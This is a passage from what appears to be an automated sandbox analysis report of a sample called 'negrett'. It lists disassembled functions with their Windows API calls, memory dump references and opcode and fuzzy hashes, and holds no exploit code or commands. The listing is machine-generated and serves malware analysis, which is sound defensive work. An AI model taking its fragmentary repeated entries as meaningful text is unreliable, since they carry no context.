                                                  • Part of subcall function 00B7000E: ProgIDFromCLSID.OLE32(?,00000000), ref: 00B70046
                                                  • Part of subcall function 00B7000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B6FF41,80070057,?,?), ref: 00B70054
                                                  • Part of subcall function 00B7000E: CoTaskMemFree.OLE32(00000000), ref: 00B70064
                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00B94C51
                                                • _wcslen.LIBCMT ref: 00B94D59
                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00B94DCF
                                                • CoTaskMemFree.OLE32(?), ref: 00B94DDA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                • String ID: NULL Pointer assignment
                                                • API String ID: 614568839-2785691316
                                                • Opcode ID: 5e0aaacec21bbddf598fc43a57717f5357fe9b5bb5f672b4e305205644da78ff
                                                • Instruction ID: aab299b2d7cd05560beab316b10862d7efb96c5cfa04df15e9155eee0041a861
                                                • Opcode Fuzzy Hash: 5e0aaacec21bbddf598fc43a57717f5357fe9b5bb5f672b4e305205644da78ff
                                                • Instruction Fuzzy Hash: 2C910671D00219AFDF14DFA4D891EEEBBB8FF08310F5085AAE919A7251DB349A45CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetMenu.USER32 ref: 00BA2183
                                                • GetMenuItemCount.USER32(00000000), ref: 00BA21B5
                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BA21DD
                                                • _wcslen.LIBCMT ref: 00BA2213
                                                • GetMenuItemID.USER32(?,?), ref: 00BA224D
                                                • GetSubMenu.USER32 ref: 00BA225B
                                                  • Part of subcall function 00B73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B73A57
                                                  • Part of subcall function 00B73A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,00B725B3), ref: 00B73A5E
                                                  • Part of subcall function 00B73A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00B73A65
                                                • PostMessageW.USER32 ref: 00BA22E3
                                                  • Part of subcall function 00B7E97B: Sleep.KERNEL32 ref: 00B7E9F3
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                • String ID:
                                                • API String ID: 4196846111-0
                                                • Opcode ID: d0ee89abf671790cb6a87e8cef4a9e77e9c7b4d04aeb3ef60297132d60cd8151
                                                • Instruction ID: 3a78f2436b27b0914f0e22b596a8d88be74571e5326d365b40e005bec50834d2
                                                • Opcode Fuzzy Hash: d0ee89abf671790cb6a87e8cef4a9e77e9c7b4d04aeb3ef60297132d60cd8151
                                                • Instruction Fuzzy Hash: 40718F75E04205AFCB10DF68C885AAEBBF5EF4A310F1484A9E916FB351DB34ED418B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: D`L$P`L
                                                • API String ID: 176396367-3785639107
                                                • Opcode ID: 4b3cc491f6bc5946fd9330b71a4f55c5b5638de3ed32a007bc476e749d4c12ad
                                                • Instruction ID: 3c2ba142b6ba3b31ba243049e3680986ecbe346732ca6508d77b5e67fb7c9d3f
                                                • Opcode Fuzzy Hash: 4b3cc491f6bc5946fd9330b71a4f55c5b5638de3ed32a007bc476e749d4c12ad
                                                • Instruction Fuzzy Hash: 3051B931A015269FCB14DF6CC9809BFB7B6BF54324B214229ED66E7284DB39DD81CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: f339462f228cd43cee0d5a019ce1904f5612ffb69be877984cc4a0db788bc284
                                                • Instruction ID: 0702fbcee371d6e287770fad0a15c1dce612fcc1b4b6ee6f7e99d505ecb8e0ba
                                                • Opcode Fuzzy Hash: f339462f228cd43cee0d5a019ce1904f5612ffb69be877984cc4a0db788bc284
                                                • Instruction Fuzzy Hash: 4051C1A16086D53DFB3682348845BBEBEE99B46304F08C5C9E1FD9A8C2C798A984D751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: c78af3acee59cf4857e914ca5e411e7c1813b573c46dd41a31dad510f0927a14
                                                • Instruction ID: 1014e9b6b7cb3b366b79090b1714881a86234ea98a7214b58590f3b5b7915b57
                                                • Opcode Fuzzy Hash: c78af3acee59cf4857e914ca5e411e7c1813b573c46dd41a31dad510f0927a14
                                                • Instruction Fuzzy Hash: 8151D5A15047D53DFB3683348C95BBEBEE89B86300F18C4D8E1ED568C2D694EC84D752
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID:
                                                • API String ID: 176396367-0
                                                • Opcode ID: d03df3173b9aea2476220ea7b25a46e51c2860381b7c24efb530bb94b21ae5d6
                                                • Instruction ID: 0c4138aaa17b5343578a952f30d35949c37f34d6b5a5093ba29508b7b8fe1445
                                                • Opcode Fuzzy Hash: d03df3173b9aea2476220ea7b25a46e51c2860381b7c24efb530bb94b21ae5d6
                                                • Instruction Fuzzy Hash: CA41B266C1021876CB92EBF488859CFB7A9AF84710F509863F618E3120FB34D255C7A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 029F214B
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 029F2153
                                                • _ValidateLocalCookies.LIBCMT ref: 029F21E1
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 029F220C
                                                • _ValidateLocalCookies.LIBCMT ref: 029F2261
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 17a0005c6933a5144f9f8d8205935f8b0f75e75d15b2970b1a508403548e2111
                                                • Instruction ID: 4451e5eb00f398759bbdf0b9b7ccf9afde6bc5542ef0a29c0de464ccf87ff155
                                                • Opcode Fuzzy Hash: 17a0005c6933a5144f9f8d8205935f8b0f75e75d15b2970b1a508403548e2111
                                                • Instruction Fuzzy Hash: 12419334E002099BCB90DF68CC84B9EBBB9BF85368F148156EF156B391D731AA51CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 00B32D4B
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00B32D53
                                                • _ValidateLocalCookies.LIBCMT ref: 00B32DE1
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00B32E0C
                                                • _ValidateLocalCookies.LIBCMT ref: 00B32E61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 5da1d15b9768441fdb1e644853fe1bf14fadf3ed1f4a3becb67e7cee39f9dd74
                                                • Instruction ID: 2907a063c806f71777b03431a96247160288e4b8a262cf5f149facc723ff49c2
                                                • Opcode Fuzzy Hash: 5da1d15b9768441fdb1e644853fe1bf14fadf3ed1f4a3becb67e7cee39f9dd74
                                                • Instruction Fuzzy Hash: 34419334A00219ABCF10DF68C885A9EBBF5FF44324F2481E5E915AB352DB35EA15CBD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BA2E1C
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00BA2E4F
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00BA2E84
                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00BA2EB6
                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00BA2EE0
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00BA2EF1
                                                • SetWindowLongW.USER32 ref: 00BA2F0B
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: LongWindow$MessageSend
                                                • String ID:
                                                • API String ID: 2178440468-0
                                                • Opcode ID: 769f8de49fcd0a71e1dbff2443922eeb292016ad6b78b86d6b822f564c919c8b
                                                • Instruction ID: d5ebfa99201133ed28c61614981bb0d3409d0cedfe058215086e5b306babfe80
                                                • Opcode Fuzzy Hash: 769f8de49fcd0a71e1dbff2443922eeb292016ad6b78b86d6b822f564c919c8b
                                                • Instruction Fuzzy Hash: 1A31F234608290AFEB21CF5CDD85F693BE1EB9B710F2501A4F9008F2B2CB71A881DB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetStdHandle.KERNEL32(0000000C), ref: 00B804F2
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B8052E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CreateHandlePipe
                                                • String ID: nul
                                                • API String ID: 1424370930-2873401336
                                                • Opcode ID: e78fcf56a305ceba59ccb12f56802a185b3e8d48790f2b80e977c5ffa0fd8e5a
                                                • Instruction ID: 0aa5dd803e5e287789994b230eaacacebe88ce73468c8988aa1a938afbb547d2
                                                • Opcode Fuzzy Hash: e78fcf56a305ceba59ccb12f56802a185b3e8d48790f2b80e977c5ffa0fd8e5a
                                                • Instruction Fuzzy Hash: 5A217E71610305AFDB20BF29D885A9A7BF4EF557A4F204A59E8A1D72F0DB709948CF20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 00B805C6
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B80601
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CreateHandlePipe
                                                • String ID: nul
                                                • API String ID: 1424370930-2873401336
                                                • Opcode ID: 458b5f1d3407380efb73d2f3a14366a797c68d8163ae8102fadbc7f3bcffa658
                                                • Instruction ID: 85599b3c8c39fcc8131dc43df131f6972b3186e5c21fc5f532057cfd372473d9
                                                • Opcode Fuzzy Hash: 458b5f1d3407380efb73d2f3a14366a797c68d8163ae8102fadbc7f3bcffa658
                                                • Instruction Fuzzy Hash: 27216D755103059FDB60BF69C845A9A77E4EF967A0F200B59E8A1E72F0EB709864CB20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B1600E: CreateWindowExW.USER32 ref: 00B1604C
                                                  • Part of subcall function 00B1600E: GetStockObject.GDI32(00000011), ref: 00B16060
                                                  • Part of subcall function 00B1600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B1606A
                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BA4112
                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BA411F
                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BA412A
                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BA4139
                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BA4145
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: MessageSend$CreateObjectStockWindow
                                                • String ID: Msctls_Progress32
                                                • API String ID: 1025951953-3636473452
                                                • Opcode ID: bef7fce1d17e8f80b4549c2b5910303f1f6f29f040b27925a33b8d6bced63bf2
                                                • Instruction ID: 781c27a609d463f13d03cb33d36c0c48183ae36223c46c82c55d65d3a657a917
                                                • Opcode Fuzzy Hash: bef7fce1d17e8f80b4549c2b5910303f1f6f29f040b27925a33b8d6bced63bf2
                                                • Instruction Fuzzy Hash: 5611B2B2140219BEEF118F64CC86EE77F9DEF09798F004111BA18A6150CBB29C61DBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                • Instruction ID: 1f10025e0db3289fbeb982eee47658dbbdbdb7e807beed3d3ea760ef957ddd8c
                                                • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                • Instruction Fuzzy Hash: 44113A715C0B04AAD620BBB0EE85FCB7BDFAF02B10F400D16A29DA60E0DE65F5069A50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • InterlockedExchange.KERNEL32(00DDA3C0,00DDA3C0), ref: 00B8097B
                                                • EnterCriticalSection.KERNEL32(00DDA3A0,00000000), ref: 00B8098D
                                                • TerminateThread.KERNEL32(00000000,000001F6), ref: 00B8099B
                                                • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00B809A9
                                                • CloseHandle.KERNEL32(00000000), ref: 00B809B8
                                                • InterlockedExchange.KERNEL32(00DDA3C0,000001F6), ref: 00B809C8
                                                • LeaveCriticalSection.KERNEL32(00DDA3A0), ref: 00B809CF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                • String ID:
                                                • API String ID: 3495660284-0
                                                • Opcode ID: fac32b2450073f99f489d891fd651bfe641534143db3f886bbdf102193b4d9c3
                                                • Instruction ID: 7d928dcb70e2ab612f7a2da57c0cbec770d3ba463e65403cf14ac8c6fc7e2e26
                                                • Opcode Fuzzy Hash: fac32b2450073f99f489d891fd651bfe641534143db3f886bbdf102193b4d9c3
                                                • Instruction Fuzzy Hash: E0F01932542A02BBD7416BA4EE8ABD6BA69FF02742F502025F202928B0CF749465CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __allrem.LIBCMT ref: 029FF4BA
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029FF4D6
                                                • __allrem.LIBCMT ref: 029FF4ED
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029FF50B
                                                • __allrem.LIBCMT ref: 029FF522
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029FF540
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 1992179935-0
                                                • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                • Instruction ID: dec9c9c9343fba6b870ff204ea54816c1b74590be1631993155b6b7fd79f38ed
                                                • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                • Instruction Fuzzy Hash: FA811872A407069BD7E49E69DC80B6A73EEEF40774F14452AE725D7AC0EBB4D9008F50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __allrem.LIBCMT ref: 00B400BA
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B400D6
                                                • __allrem.LIBCMT ref: 00B400ED
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B4010B
                                                • __allrem.LIBCMT ref: 00B40122
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B40140
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 1992179935-0
                                                • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                • Instruction ID: 143ce8090f3cb7eec46dbea6ea6d9b33fb78c8882be4a9ca787452ffdff34507
                                                • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                • Instruction Fuzzy Hash: 7481E671A117069BE720BF69CC41B6B73E9EF51324F2445BAFA51D7281E770DA00AB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B8080C
                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00B80847
                                                • EnterCriticalSection.KERNEL32(?), ref: 00B80863
                                                • LeaveCriticalSection.KERNEL32(?), ref: 00B808DC
                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00B808F3
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B80921
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                • String ID:
                                                • API String ID: 3368777196-0
                                                • Opcode ID: 913df0edd0dcc22cf3bf58cbbb4e51f53398b0376ad0aa00c33e77ab0f9ac959
                                                • Instruction ID: 9fd34fe90cbfd6fa16b60566697a2e19fd08d2e36d0e138641cc99545a3fe1d8
                                                • Opcode Fuzzy Hash: 913df0edd0dcc22cf3bf58cbbb4e51f53398b0376ad0aa00c33e77ab0f9ac959
                                                • Instruction Fuzzy Hash: EB416B71A10205EBDF15AF54DC85AAAB7B8FF04310F1440B9ED04AB2A7DB30DE64DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00BA824C
                                                • EnableWindow.USER32(00000000,00000000), ref: 00BA8272
                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00BA82D1
                                                • ShowWindow.USER32(00000000,00000004), ref: 00BA82E5
